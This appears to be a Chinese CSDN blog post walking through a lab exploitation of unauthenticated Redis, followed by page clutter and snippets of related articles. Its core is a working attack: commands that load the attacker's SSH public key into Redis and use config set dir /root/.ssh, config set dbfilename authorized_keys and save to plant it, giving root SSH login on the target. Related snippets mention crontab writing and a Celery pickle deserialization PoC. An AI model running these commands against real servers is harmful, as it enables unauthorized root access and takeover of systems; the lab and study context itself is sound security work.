redis未授权访问利用

最新推荐文章于 2023-07-14 15:20:09 发布
最新推荐文章于 2023-07-14 15:20:09 发布
阅读量332 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q1694222672/article/details/104843502
版权

文章目录

准备环境

靶机一台:centos7,172.16.12.2
开redis服务,6379

本机,有redis-cli客户端

连接测试

redis-cli -h 172.16.12.2

在这里插入图片描述
在这里插入图片描述

利用方式:写入本地公钥

生成本地公钥

ssh-keygen -t rsa

在这里插入图片描述

写入公钥到redis

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt

cat /tmp/foo.txt |  /usr/redis/redis-cli -h 172.16.12.2 -p 6379 -x set crackit

在这里插入图片描述

连接redis写入靶机

redis-cli -h 172.16.12.2
keys *
config set dir /root/.ssh
config get dir
config set dbfilename "authorized_keys"
save 
exit

在这里插入图片描述

连接靶机

因为设置了phase,所以输入123456
在这里插入图片描述

StarLord007
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis授权访问利用总结
2ed
10-09 1645
漏洞概述 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞...
redis授权访问漏洞
weixin_42140534的博客
01-18 931
0X01 漏洞介绍 redis 默认情况下,会绑定再 0.0.0.0:6379, 如果没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源的ip访问,这样会将redis的服务暴漏在公网上,如果在没有设置密码认证的情况下,会导致任意用户可以访问目标服务器的情况下授权访问redis以及读取redis数据。攻击者在授权访问redis的情况下,利用redis自身提供的config命令,可以进行写文件的操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_
请务必注意 Redis 安全配置,否则将导致轻松被入侵
多看多听多总结
12-16 4330
一、前言 前段时间,在做内网影响程度评估的时候写了扫描利用小脚本, 扫描后统计发现,内网中60%开放了redis6379端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的 考虑到本社区大部分开发者都会使用redis,特此分享下以便大家可以对自己公司的内网进行一个排查。 二、漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Red
Redis授权访问配合SSH key的综合利用
hyy615545936的博客
09-11 1542
【实验原理】 利用 Redis 自身的提供的config命令,可以进行写文件操作,恶意访问者可以成功将自己的公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以直接使用对应的私钥登录目标服务器。 步骤一:在本地生产公私钥文件 linux系统行使用命令ssh-keygen -t rsa生成本地公钥和私钥文件,输入密码口令;如下其显示成功生成公...
redis故障记录
weixin_30898109的博客
12-16 172
最近线上的redis出现无法访问的现象,redis-cli能进入,但是任何命令都提示需要密码验证,以前一直都没有设置密码的,重启redis后正常,没过多久又出现了这个问题。 在此记录下解决方法。 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis 授权访问的问题是...
linux echo命令的-n、-e两个参数
热门推荐
水滴石穿
02-25 1万+
echo -n 不换行输出 $echo -n "123" $echo "456" 最终输出 123456 而不是123456 echo -e 处理特殊字符若字符串中出现以下字符,则特别加以处理,而不会将它当成一般文字输出: \a 发出警告声; \b 删除前一个字符; \c 最后不加上换行符号; \f 换行但光标仍旧停留在原来的位置; \n 换行且光标移至行首; \r 光标移
redis授权访问利用汇总
今天是几号的博客
03-17 1185
原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生成一个授权的key。/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名,比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。
Redis授权访问利用
LiuSiXian的博客
07-14 686
Redis服务器:192.168.100.10攻击机:192.168.15.101。
Redis授权访问利用合集
em.....
07-07 836
微信公众号:小惜渗透,欢迎大佬一起交流进步正常redis默认情况下,会绑定在0.0.0.0:6379,如果没有限制来源IP并且甚至没有密码,那么就会导致攻击者非法访问,并读取Redis的数据,还可以利用自身config命令进行写入操作,攻击者可将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys中,进而直接使用对应私钥登录目标服务器。搭建环境: 将这行绑定本地加上注释(还可以改成0.0.0.0)将保护模式关闭保存,然后启动redis服务 切记别忘了关防火墙在/roo
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题...
渗透学习入门学习之环境搭建,web入门
STAR_LORD
11-21 4479
1、搭建渗透测试学习环境 2003r2最好,win7也行2、各种网站解析环境搭建 Asp解析环境搭建 小旋风 Php解析环境搭建 phpstudy aspx解析环境搭建 jsp解析环境搭建 jspstudy3、常规渗透环境网络环境解析 1.操作系统选择 Windows2003 2008 Linux red hat FreeBSD Ubuntu等2.网站源码脚本格式 Asp php
SQL注入篇--MySQL数据库 手工注入
STAR_LORD
08-01 3074
MySQL数据库 主流数据库之一 功能完善,强大 手工注入 1、判断注入点
GITHUB信息泄露搜集工具GSIL修改版
STAR_LORD
01-10 2820
文章目录项目地址(欢迎Star、Fork)原项目地址修改后的地址关于GSIL-PRO关于开源项目GSIL修改内容使用方式原项目GSIL代码分析,方便快速定位功能点参数配置:限制关于源码,有兴趣的可以改成自己想要的样子 项目地址(欢迎Star、Fork) 原项目地址 GSIL 修改后的地址 GSIL_PRO 关于GSIL-PRO 该项目修改自开源项目GSIL,初衷是为了方便自己的使用,并做了一些...
渗透入门学习之http数据包
STAR_LORD
11-25 2324
为什么可以截断数据包? http是一种无状态数据,对数据包拦截不影响它的状态 HTTP修改数据包作用: - 漏洞测试 * 目录遍历 * 注入 * 绕过授权 * xss跨站 * 弱口令爆破 * 上
SQL注入篇--Access数据库 手工(联合查询,逐字猜解)加工具注入(sqlmap)
STAR_LORD
07-27 1492
Access数据库 正式名称 Microsoft_Access 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具 手工注入 1.判断注入点 这里采用墨者学院提供的SQL手工注入漏洞测试环境 http://219.153.49.228:47744/new_list.asp?id=1 判断注入点标准三连 ’ ~ and 1=1 ~ and 1=2 ...
ASP外观专利图像检索平台(源代码+论文).rar
最新发布
07-21
ASP外观专利图像检索平台(源代码+论文)
Redis授权访问漏洞
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用程序和数据造成极大的安全风险。 攻击者通常会利用一些特定的工具或者脚本进行扫描,寻找处于授权状态的Redis服务。这些工具会自动化地进行扫描并利用默认口令或弱口令进行暴力破解,从而获取服务器权限。 为了避免Redis授权访问漏洞的发生,建议管理员在使用Redis时,采取以下措施: 1. 禁止公网访问:将Redis服务器部署在内网中,并禁止对公网开放访问。 2. 修改默认口令:使用较为复杂的口令,并定期更换口令。 3. 启用身份验证:启用Redis的身份验证功能,只允许已授权的用户访问。 4. 定期更新补丁:及时更新Redis的安全补丁,以修复已知漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值